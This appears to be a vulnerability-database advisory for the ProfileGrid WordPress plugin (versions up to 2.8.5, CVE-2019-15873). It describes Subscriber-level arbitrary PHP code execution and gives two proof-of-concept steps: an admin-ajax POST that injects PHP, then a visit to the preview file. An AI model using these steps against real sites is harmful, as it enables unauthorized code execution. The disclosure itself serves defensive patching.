Lucene search
Karim El OuerghemmiWPEX-ID:76D7786E-F851-4C35-86CE-19A929929C8CHistoryMay 18, 2018 - 12:00 a.m.
ProfileGrid – User Profiles, Groups and Communities <= 2.8.5 - Authenticated Code Execution
2018-05-1800:00:00
Karim El Ouerghemmi
6
0.003 Low
EPSS
Percentile
71.5%
The plugin ProfileGrid – User Profiles, Groups and Communities versions prior to 2.8.6 is vulnerable to Arbitrary Code Execution. An authenticated user with a role as low as Subscriber can execute arbitrary PHP code on websites using the plugin.
Send an authenticated POST request to wp-admin/admin-ajax.php with parameters action=pm_template_preview&html=<?php phpinfo();
Visit wp-content/plugins/profilegrid-user-profiles-groups-and-communities/admin/partials/email-preview.phpRelated
wpvulndb
wpvulndb
cve
cve
CVE-2019-15873
2019-09-03 13:15:11
nvd
nvd
CVE-2019-15873
2019-09-03 13:15:11
prion
prion
Remote code execution
2019-09-03 13:15:00
cvelist
cvelist
CVE-2019-15873
2019-09-03 12:22:19